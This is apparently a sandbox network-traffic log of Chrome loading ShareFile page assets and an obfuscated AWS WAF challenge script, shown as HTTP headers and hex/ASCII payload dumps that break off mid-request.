                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC16384INData Raw: 63 72 6f 6c 6c 4d 65 6d 6f 69 7a 65 64 3d 72 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 69 6e 76 6f 6b 65 4f 6e 43 65 6c 6c 73 52 65 6e 64 65 72 65 64 43 61 6c 6c 62 61 63 6b 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 73 74 61 72 74 49 6e 64 65 78 4d 65 6d 6f 69 7a 65 64 3d 3d 3d 74 68 69 73 2e 5f 73 74 61 72 74 49 6e 64 65 78 26 26 74 68 69 73 2e 5f 73 74 6f 70 49 6e 64 65 78 4d 65 6d 6f 69 7a 65 64 3d 3d 3d 74 68 69 73 2e 5f 73 74 6f 70 49 6e 64 65 78 7c 7c 28 28 30 2c 74 68 69 73 2e 70 72 6f 70 73 2e 6f 6e 43 65 6c 6c 73 52 65 6e 64 65 72 65 64 29 28 7b 73 74 61 72 74 49 6e 64 65 78 3a 74 68 69 73 2e 5f 73 74 61 72 74 49 6e 64 65 78 2c 73 74 6f 70 49 6e 64 65 78 3a 74 68 69 73 2e 5f 73 74 6f 70 49 6e 64 65 78 7d 29 2c 74 68 69 73
                                                                                                                                                                                                                                                                                Data Ascii: crollMemoized=r)}},{key:"_invokeOnCellsRenderedCallback",value:function(){this._startIndexMemoized===this._startIndex&&this._stopIndexMemoized===this._stopIndex||((0,this.props.onCellsRendered)({startIndex:this._startIndex,stopIndex:this._stopIndex}),this
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC16384INData Raw: 47 72 69 64 3a 22 22 2c 63 6c 61 73 73 4e 61 6d 65 54 6f 70 4c 65 66 74 47 72 69 64 3a 22 22 2c 63 6c 61 73 73 4e 61 6d 65 54 6f 70 52 69 67 68 74 47 72 69 64 3a 22 22 2c 65 6e 61 62 6c 65 46 69 78 65 64 43 6f 6c 75 6d 6e 53 63 72 6f 6c 6c 3a 21 31 2c 65 6e 61 62 6c 65 46 69 78 65 64 52 6f 77 53 63 72 6f 6c 6c 3a 21 31 2c 66 69 78 65 64 43 6f 6c 75 6d 6e 43 6f 75 6e 74 3a 30 2c 66 69 78 65 64 52 6f 77 43 6f 75 6e 74 3a 30 2c 73 63 72 6f 6c 6c 54 6f 43 6f 6c 75 6d 6e 3a 2d 31 2c 73 63 72 6f 6c 6c 54 6f 52 6f 77 3a 2d 31 2c 73 74 79 6c 65 3a 7b 7d 2c 73 74 79 6c 65 42 6f 74 74 6f 6d 4c 65 66 74 47 72 69 64 3a 7b 7d 2c 73 74 79 6c 65 42 6f 74 74 6f 6d 52 69 67 68 74 47 72 69 64 3a 7b 7d 2c 73 74 79 6c 65 54 6f 70 4c 65 66 74 47 72 69 64 3a 7b 7d 2c 73 74 79
                                                                                                                                                                                                                                                                                Data Ascii: Grid:"",classNameTopLeftGrid:"",classNameTopRightGrid:"",enableFixedColumnScroll:!1,enableFixedRowScroll:!1,fixedColumnCount:0,fixedRowCount:0,scrollToColumn:-1,scrollToRow:-1,style:{},styleBottomLeftGrid:{},styleBottomRightGrid:{},styleTopLeftGrid:{},sty


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                6192.168.2.64972213.248.193.2514432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC1287OUTGET /css/sharefilebrand/sf-spinner.svg HTTP/1.1
                                                                                                                                                                                                                                                                                Host: premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                Referer: https://premierbb.sharefile.com/css/spinner.css
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Cookie: AWSALBTG=yeaoNvKSa+w+/n+txt0pbKRB6mstD+XeKa8kLTOIyBOap7p7cflZLtpF2x7ATHR7DRxkDbsTCDsJkS3gU56W6M5mlTs/Vx282d2X723Vl/wTgnuuqfn+Pk3kLcZQ6Q8Ymk6j85+osRe7v6H4/N0W5xOyAVQa/wuahiZEsF7M3dwJ; AWSALBTGCORS=yeaoNvKSa+w+/n+txt0pbKRB6mstD+XeKa8kLTOIyBOap7p7cflZLtpF2x7ATHR7DRxkDbsTCDsJkS3gU56W6M5mlTs/Vx282d2X723Vl/wTgnuuqfn+Pk3kLcZQ6Q8Ymk6j85+osRe7v6H4/N0W5xOyAVQa/wuahiZEsF7M3dwJ; AWSALB=5uI9CDeQ1KRrzqyqh7Omqb0TVvbacFIAp+0dpQxnyjPT+FEicmXlL8JnGNtR7BYYRveFGdMTiik9JDta3G0pPu8PDkl0Uzzado0rPBVvQhEaOq0OhZ6SuGRNsn6x; AWSALBCORS=5uI9CDeQ1KRrzqyqh7Omqb0TVvbacFIAp+0dpQxnyjPT+FEicmXlL8JnGNtR7BYYRveFGdMTiik9JDta3G0pPu8PDkl0Uzzado0rPBVvQhEaOq0OhZ6SuGRNsn6x
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC1419INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:06 GMT
                                                                                                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                Content-Length: 872
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTG=c1s+nr1v7dakGJOPy9hufhRvmBzI3tzIakbYCc4BJLwJ2kkULT2o+9Nkere7ST4oxsNUu+HSmW7uQovfPXJN+OEdiAlNhGp77mLkbi0OeOU34rmhvotJLausHaJra/B6E3XmL6KCWBxvEkNuj30jHzCTbc7U0GR2tOQKjnyGE1eZ; Expires=Wed, 16 Oct 2024 18:05:06 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTGCORS=c1s+nr1v7dakGJOPy9hufhRvmBzI3tzIakbYCc4BJLwJ2kkULT2o+9Nkere7ST4oxsNUu+HSmW7uQovfPXJN+OEdiAlNhGp77mLkbi0OeOU34rmhvotJLausHaJra/B6E3XmL6KCWBxvEkNuj30jHzCTbc7U0GR2tOQKjnyGE1eZ; Expires=Wed, 16 Oct 2024 18:05:06 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALB=dK1C0GjtASVTA5tLGFNZfnupLnUE7gbaRlsnuyP39sJemVdiw2K+fG0pZvkS5LB+OQ+Kt0WycuPqo8V7IVwoSXcAYo1SOMIDUqGLaPI4v9YNuKLe4G7ahN7i5+hv; Expires=Wed, 16 Oct 2024 18:05:06 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBCORS=dK1C0GjtASVTA5tLGFNZfnupLnUE7gbaRlsnuyP39sJemVdiw2K+fG0pZvkS5LB+OQ+Kt0WycuPqo8V7IVwoSXcAYo1SOMIDUqGLaPI4v9YNuKLe4G7ahN7i5+hv; Expires=Wed, 16 Oct 2024 18:05:06 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                ETag: "1db18773a8c2468"
                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 07 Oct 2024 05:10:30 GMT
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                2024-10-09 18:05:06 UTC872INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 0a 09 77 69 64 74 68 3d 22 31 65 6d 22 0a 09 68 65 69 67 68 74 3d 22 31 65 6d 22 0a 09 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 0a 09 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 38 20 32 34 30 22 0a 09 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 0a 3e 0a 09 3c 70 61 74 68 20 64 3d 22 4d 39 38 2e 37 35 37 37 20 31 36 32 2e 39 38 34 4c 36 36 2e 36 39 37 31 20 32 31 38 2e 35 31 34 4c 35 33 2e 36 34 39 31 20 32 31 30 2e 39 37 33 4c 35 31 2e 39 37 31 35 20 32 31 30 2e 30 30 37 4c 36 39 2e 32 38 39 37 20 31 38 30 2e 30 31 34 48 30 56 31 36 32 2e 39 38 34 48 39
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svgwidth="1em"height="1em"fill="currentColor"viewBox="0 0 208 240"xmlns="http://www.w3.org/2000/svg"><path d="M98.7577 162.984L66.6971 218.514L53.6491 210.973L51.9715 210.007L69.2897 180.014H0V162.984H9


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                7192.168.2.64972318.173.205.914432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC550OUTGET /0093b71e39a6/478ed03bbf12/challenge.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC596INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/javascript
                                                                                                                                                                                                                                                                                Content-Length: 1096693
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:07 GMT
                                                                                                                                                                                                                                                                                cache-control: private, max-age=86400, stale-while-revalidate=604800
                                                                                                                                                                                                                                                                                last-modified: Wed, 9 Oct 2024 18:05:07 +0000
                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                expires: 0
                                                                                                                                                                                                                                                                                x-amzn-waf-challenge-id: Root=1-6706c5d3-604a28071539340a1bb049a9
                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 daf01c71790f42e645ae4024c607941e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA56-P12
                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: SFNgjRti_A2Gm3L2CvgF3jZ29Rd16o98rQoWJQIdM7b3ky5TRjdu4g==
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC8623INData Raw: 76 61 72 20 61 30 5f 30 78 32 66 38 37 3d 5b 27 6e 6f 6e 52 65 70 75 64 69 61 74 69 6f 6e 27 2c 27 50 55 42 4c 49 43 5c 78 32 30 4b 45 59 27 2c 27 6b 65 79 27 2c 27 65 6e 63 72 79 70 74 69 6f 6e 50 61 72 61 6d 73 27 2c 27 31 56 68 4f 52 54 4b 27 2c 27 32 34 38 37 32 69 63 63 59 6e 71 27 2c 27 43 6f 6d 6d 65 6e 74 3a 5c 78 32 30 27 2c 27 74 6f 74 61 6c 46 6f 63 75 73 54 69 6d 65 27 2c 27 63 6c 6f 73 65 5f 6e 6f 74 69 66 79 27 2c 27 63 72 63 43 61 6c 63 75 6c 61 74 6f 72 27 2c 27 67 65 74 43 69 70 68 65 72 53 75 69 74 65 27 2c 27 44 6f 4e 6f 74 54 72 61 63 6b 43 6f 6c 6c 65 63 74 6f 72 27 2c 27 66 69 72 73 74 43 68 69 6c 64 27 2c 27 43 6f 75 6c 64 5c 78 32 30 6e 6f 74 5c 78 32 30 61 64 64 5c 78 32 30 50 4b 43 53 23 37 5c 78 32 30 73 69 67 6e 65 72 3b 5c 78
                                                                                                                                                                                                                                                                                Data Ascii: var a0_0x2f87=['nonRepudiation','PUBLIC\x20KEY','key','encryptionParams','1VhORTK','24872iccYnq','Comment:\x20','totalFocusTime','close_notify','crcCalculator','getCipherSuite','DoNotTrackCollector','firstChild','Could\x20not\x20add\x20PKCS#7\x20signer;\x
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC16384INData Raw: 41 6c 67 6f 72 69 74 68 6d 2e 41 6c 67 6f 72 69 74 68 6d 49 64 65 6e 74 69 66 69 65 72 2e 61 6c 67 6f 72 69 74 68 6d 27 2c 27 52 65 61 6c 50 6c 61 79 65 72 2e 52 65 61 6c 50 6c 61 79 65 72 28 74 6d 29 5c 78 32 30 41 63 74 69 76 65 58 5c 78 32 30 43 6f 6e 74 72 6f 6c 5c 78 32 30 28 33 32 2d 62 69 74 29 27 2c 27 6e 61 6d 65 43 6f 6e 73 74 72 61 69 6e 74 73 27 2c 27 73 65 74 50 72 69 76 61 74 65 4b 65 79 27 2c 27 73 75 62 74 6c 65 27 2c 27 41 72 72 6f 77 44 6f 77 6e 27 2c 27 33 30 30 34 30 35 69 78 7a 5a 4e 4f 27 2c 27 69 73 45 6d 70 74 79 27 2c 27 5c 78 32 30 28 49 6e 74 65 67 65 72 29 27 2c 27 31 31 31 31 27 2c 27 35 35 36 36 33 55 50 73 63 53 71 27 2c 27 57 65 62 43 72 79 70 74 6f 43 6f 6c 6c 65 63 74 6f 72 27 2c 27 50 42 45 53 32 41 6c 67 6f 72 69 74 68
                                                                                                                                                                                                                                                                                Data Ascii: Algorithm.AlgorithmIdentifier.algorithm','RealPlayer.RealPlayer(tm)\x20ActiveX\x20Control\x20(32-bit)','nameConstraints','setPrivateKey','subtle','ArrowDown','300405ixzZNO','isEmpty','\x20(Integer)','1111','55663UPscSq','WebCryptoCollector','PBES2Algorith
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC16384INData Raw: 27 43 65 72 74 69 66 69 63 61 74 65 5c 78 32 30 75 6e 6b 6e 6f 77 6e 2e 27 2c 27 33 31 72 53 72 41 59 68 27 2c 27 6d 61 63 49 74 65 72 61 74 69 6f 6e 73 27 2c 27 73 75 62 73 74 72 69 6e 67 27 2c 27 31 79 78 63 56 6f 46 27 2c 27 5d 5c 78 32 30 45 78 70 65 63 74 65 64 5c 78 32 30 63 6f 6e 73 74 72 75 63 74 65 64 5c 78 32 30 5c 78 32 32 27 2c 27 70 72 6f 76 69 64 65 27 2c 27 66 6f 72 6d 27 2c 27 6f 69 64 54 6f 44 65 72 27 2c 27 6f 62 73 65 72 76 65 27 2c 27 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 27 2c 27 73 68 61 35 31 32 2d 32 35 36 27 2c 27 63 68 65 63 6b 41 63 74 69 76 65 58 50 6c 75 67 69 6e 27 2c 27 64 6f 45 6e 63 72 79 70 74 27 2c 27 5f 69 6e 74 73 27 2c 27 63 65 72 74 49 64 27 2c 27 53 77 69 73 37 32 31 5c 78 32 30 43 6e 5c 78 32 30 42 54 27
                                                                                                                                                                                                                                                                                Data Ascii: 'Certificate\x20unknown.','31rSrAYh','macIterations','substring','1yxcVoF',']\x20Expected\x20constructed\x20\x22','provide','form','oidToDer','observe','0123456789ABCDEF','sha512-256','checkActiveXPlugin','doEncrypt','_ints','certId','Swis721\x20Cn\x20BT'
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC16384INData Raw: 61 74 65 27 2c 27 43 61 6e 6e 6f 74 5c 78 32 30 72 65 61 64 5c 78 32 30 65 6e 63 72 79 70 74 65 64 5c 78 32 30 70 72 69 76 61 74 65 5c 78 32 30 6b 65 79 2e 5c 78 32 30 41 53 4e 2e 31 5c 78 32 30 6f 62 6a 65 63 74 5c 78 32 30 69 73 5c 78 32 30 6e 6f 74 5c 78 32 30 61 5c 78 32 30 73 75 70 70 6f 72 74 65 64 5c 78 32 30 45 6e 63 72 79 70 74 65 64 50 72 69 76 61 74 65 4b 65 79 49 6e 66 6f 2e 27 2c 27 53 48 41 2d 35 31 32 2f 32 35 36 27 2c 27 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 27 2c 27 73 65 72 76 65 72 41 75 74 68 27 2c 27 74 68 69 73 27 2c 27 31 2e 32 2e 38 34 30 2e 31 31 33 35 34 39 2e 31 2e 39 2e 34 27 2c 27 73 68 61 35 31 32 2f 32 32 34 27 2c 27 35 33 33 35 36 31 59 44 79 62 70 64 27 2c 27 48 61 72 72 69 6e 67 74 6f 6e 27 2c 27 43 61 6e 6e 6f
                                                                                                                                                                                                                                                                                Data Ascii: ate','Cannot\x20read\x20encrypted\x20private\x20key.\x20ASN.1\x20object\x20is\x20not\x20a\x20supported\x20EncryptedPrivateKeyInfo.','SHA-512/256','addEventListener','serverAuth','this','1.2.840.113549.1.9.4','sha512/224','533561YDybpd','Harrington','Canno
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC16384INData Raw: 5c 78 32 30 27 2c 27 76 69 65 77 70 6f 72 74 57 69 64 74 68 27 2c 27 63 65 72 74 69 66 69 63 61 74 65 52 65 71 75 65 73 74 27 2c 27 32 2e 31 36 2e 38 34 30 2e 31 2e 31 30 31 2e 33 2e 34 2e 32 2e 32 27 2c 27 66 6f 72 67 65 2e 70 6b 69 2e 55 6e 73 75 70 70 6f 72 74 65 64 43 65 72 74 69 66 69 63 61 74 65 27 2c 27 63 6f 6d 70 61 63 74 27 2c 27 47 61 62 72 69 6f 6c 61 27 2c 27 53 61 66 65 42 61 67 27 2c 27 31 2e 32 2e 38 34 30 2e 31 31 33 35 34 39 2e 31 2e 39 2e 36 27 2c 27 63 69 70 68 65 72 53 75 69 74 65 27 2c 27 73 71 72 54 6f 27 2c 27 31 2e 33 2e 36 2e 31 2e 34 2e 31 2e 33 31 31 2e 36 30 2e 32 2e 31 2e 33 27 2c 27 4f 6e 6c 79 5c 78 32 30 48 54 54 50 53 5c 78 32 30 69 73 5c 78 32 30 73 75 70 70 6f 72 74 65 64 27 2c 27 69 73 45 76 65 6e 27 2c 27 61 6d 7a 6e
                                                                                                                                                                                                                                                                                Data Ascii: \x20','viewportWidth','certificateRequest','2.16.840.1.101.3.4.2.2','forge.pki.UnsupportedCertificate','compact','Gabriola','SafeBag','1.2.840.113549.1.9.6','cipherSuite','sqrTo','1.3.6.1.4.1.311.60.2.1.3','Only\x20HTTPS\x20is\x20supported','isEven','amzn
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC16384INData Raw: 5f 30 78 33 38 35 65 64 38 20 69 6e 20 5f 30 78 35 34 39 31 64 30 7c 7c 28 5f 30 78 33 65 62 62 39 64 7c 7c 28 5f 30 78 33 65 62 62 39 64 3d 41 72 72 61 79 5b 5f 30 78 35 61 35 33 31 38 28 30 78 33 64 63 29 5d 5b 5f 30 78 35 61 35 33 31 38 28 30 78 61 65 31 29 5d 5b 5f 30 78 35 61 35 33 31 38 28 30 78 35 37 37 29 5d 28 5f 30 78 35 34 39 31 64 30 2c 30 78 30 2c 5f 30 78 33 38 35 65 64 38 29 29 2c 5f 30 78 33 65 62 62 39 64 5b 5f 30 78 33 38 35 65 64 38 5d 3d 5f 30 78 35 34 39 31 64 30 5b 5f 30 78 33 38 35 65 64 38 5d 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 32 35 30 38 32 66 5b 5f 30 78 35 61 35 33 31 38 28 30 78 31 36 38 29 5d 28 5f 30 78 33 65 62 62 39 64 7c 7c 41 72 72 61 79 5b 5f 30 78 35 61 35 33 31 38 28 30 78 33 64 63 29 5d 5b 5f 30 78 35 61 35 33 31
                                                                                                                                                                                                                                                                                Data Ascii: _0x385ed8 in _0x5491d0||(_0x3ebb9d||(_0x3ebb9d=Array[_0x5a5318(0x3dc)][_0x5a5318(0xae1)][_0x5a5318(0x577)](_0x5491d0,0x0,_0x385ed8)),_0x3ebb9d[_0x385ed8]=_0x5491d0[_0x385ed8]);}return _0x25082f[_0x5a5318(0x168)](_0x3ebb9d||Array[_0x5a5318(0x3dc)][_0x5a531
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC16384INData Raw: 78 36 32 39 33 35 34 28 30 78 62 65 34 29 2c 5f 30 78 36 32 39 33 35 34 28 30 78 35 30 32 29 5d 2c 5f 30 78 34 30 63 36 31 37 3d 6e 65 77 20 44 61 74 65 28 29 5b 5f 30 78 32 61 36 61 31 66 5b 30 78 30 5d 5d 28 29 3b 5f 30 78 34 30 63 36 31 37 2d 5f 30 78 36 34 34 36 30 37 3e 3d 5f 30 78 31 37 34 61 35 35 26 26 28 5f 30 78 31 37 34 61 35 35 3d 5f 30 78 34 30 63 36 31 37 2c 5f 30 78 32 32 61 66 35 63 5b 5f 30 78 32 61 36 61 31 66 5b 30 78 31 5d 5d 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 3b 7d 3b 7d 2c 5f 30 78 35 31 64 65 38 66 3b 7d 28 29 3b 5f 30 78 34 62 39 30 65 31 5b 5f 30 78 34 35 36 61 35 65 28 30 78 38 62 38 29 5d 3d 5f 30 78 31 62 38 66 61 38 3b 7d 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 32 38 38 63 61 2c 5f 30 78 35 39 30 32 38 62 2c
                                                                                                                                                                                                                                                                                Data Ascii: x629354(0xbe4),_0x629354(0x502)],_0x40c617=new Date()[_0x2a6a1f[0x0]]();_0x40c617-_0x644607>=_0x174a55&&(_0x174a55=_0x40c617,_0x22af5c[_0x2a6a1f[0x1]](this,arguments));};},_0x51de8f;}();_0x4b90e1[_0x456a5e(0x8b8)]=_0x1b8fa8;},function(_0x4288ca,_0x59028b,
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC15005INData Raw: 69 6f 6e 20 5f 30 78 37 62 34 37 61 37 28 29 7b 7d 72 65 74 75 72 6e 20 5f 30 78 37 62 34 37 61 37 5b 5f 30 78 34 63 62 64 30 30 5b 30 78 30 5d 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 31 65 62 33 64 39 3d 5f 30 78 33 32 62 62 33 30 2c 5f 30 78 33 61 34 62 30 32 3d 5b 2f 4d 53 49 45 20 5b 30 2d 39 2e 5d 2b 2f 69 2c 5f 30 78 31 65 62 33 64 39 28 30 78 31 31 33 29 2c 5f 30 78 31 65 62 33 64 39 28 30 78 39 63 34 29 2c 5f 30 78 31 65 62 33 64 39 28 30 78 37 64 37 29 5d 3b 72 65 74 75 72 6e 21 21 77 69 6e 64 6f 77 5b 5f 30 78 33 61 34 62 30 32 5b 30 78 31 5d 5d 5b 5f 30 78 33 61 34 62 30 32 5b 30 78 32 5d 5d 5b 5f 30 78 33 61 34 62 30 32 5b 30 78 33 5d 5d 28 5f 30 78 33 61 34 62 30 32 5b 30 78 30 5d 29 3b 7d 2c 5f 30 78 37 62 34 37 61 37 5b
                                                                                                                                                                                                                                                                                Data Ascii: ion _0x7b47a7(){}return _0x7b47a7[_0x4cbd00[0x0]]=function(){var _0x1eb3d9=_0x32bb30,_0x3a4b02=[/MSIE [0-9.]+/i,_0x1eb3d9(0x113),_0x1eb3d9(0x9c4),_0x1eb3d9(0x7d7)];return!!window[_0x3a4b02[0x1]][_0x3a4b02[0x2]][_0x3a4b02[0x3]](_0x3a4b02[0x0]);},_0x7b47a7[
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC16384INData Raw: 33 28 30 78 63 31 30 29 2c 5f 30 78 31 39 30 63 38 33 28 30 78 62 39 65 29 5d 3b 74 68 69 73 5b 5f 30 78 33 33 38 61 65 37 5b 30 78 34 5d 5d 28 5f 30 78 33 33 38 61 65 37 5b 30 78 30 5d 2c 5f 30 78 33 33 38 61 65 37 5b 30 78 31 5d 2c 5f 30 78 34 37 39 34 39 30 5b 5f 30 78 33 33 38 61 65 37 5b 30 78 32 5d 5d 2c 5f 30 78 34 37 39 34 39 30 5b 5f 30 78 33 33 38 61 65 37 5b 30 78 33 5d 5d 29 3b 7d 2c 5f 30 78 34 37 39 34 39 30 5b 5f 30 78 33 32 37 38 31 35 5b 30 78 35 5d 5d 5b 5f 30 78 33 32 37 38 31 35 5b 30 78 31 36 5d 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 35 62 38 30 32 36 3d 5f 30 78 39 31 37 32 31 64 2c 5f 30 78 33 66 36 39 61 37 3d 5b 27 73 70 6c 69 63 65 27 2c 5f 30 78 35 62 38 30 32 36 28 30 78 39 64 36 29 2c 30 78 30 2c 27 75 73
                                                                                                                                                                                                                                                                                Data Ascii: 3(0xc10),_0x190c83(0xb9e)];this[_0x338ae7[0x4]](_0x338ae7[0x0],_0x338ae7[0x1],_0x479490[_0x338ae7[0x2]],_0x479490[_0x338ae7[0x3]]);},_0x479490[_0x327815[0x5]][_0x327815[0x16]]=function(){var _0x5b8026=_0x91721d,_0x3f69a7=['splice',_0x5b8026(0x9d6),0x0,'us
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC16384INData Raw: 39 3d 5f 30 78 32 64 32 31 63 39 2c 5f 30 78 31 31 32 33 37 66 3d 5b 5f 30 78 65 30 65 32 35 39 28 30 78 63 30 34 29 2c 5f 30 78 65 30 65 32 35 39 28 30 78 62 65 34 29 5d 3b 72 65 74 75 72 6e 20 5f 30 78 35 34 61 37 34 38 5b 5f 30 78 31 31 32 33 37 66 5b 30 78 30 5d 5d 3d 6e 65 77 20 44 61 74 65 28 29 5b 5f 30 78 31 31 32 33 37 66 5b 30 78 31 5d 5d 28 29 3b 7d 29 3b 7d 2c 5f 30 78 31 38 38 66 64 35 5b 5f 30 78 36 36 30 36 62 34 5b 30 78 36 5d 5d 5b 5f 30 78 36 36 30 36 62 34 5b 30 78 31 5d 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 35 63 38 35 30 3d 5f 30 78 32 39 30 63 33 32 2c 5f 30 78 33 63 38 34 66 32 3d 5b 30 78 30 2c 5f 30 78 34 35 63 38 35 30 28 30 78 34 35 38 29 5d 3b 72 65 74 75 72 6e 28 30 78 30 2c 5f 30 78 34 39 35 39 64 66
                                                                                                                                                                                                                                                                                Data Ascii: 9=_0x2d21c9,_0x11237f=[_0xe0e259(0xc04),_0xe0e259(0xbe4)];return _0x54a748[_0x11237f[0x0]]=new Date()[_0x11237f[0x1]]();});},_0x188fd5[_0x6606b4[0x6]][_0x6606b4[0x1]]=function(){var _0x45c850=_0x290c32,_0x3c84f2=[0x0,_0x45c850(0x458)];return(0x0,_0x4959df


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                8192.168.2.64972476.223.1.1664432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC1028OUTGET /css/sharefilebrand/sf-spinner.svg HTTP/1.1
                                                                                                                                                                                                                                                                                Host: premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
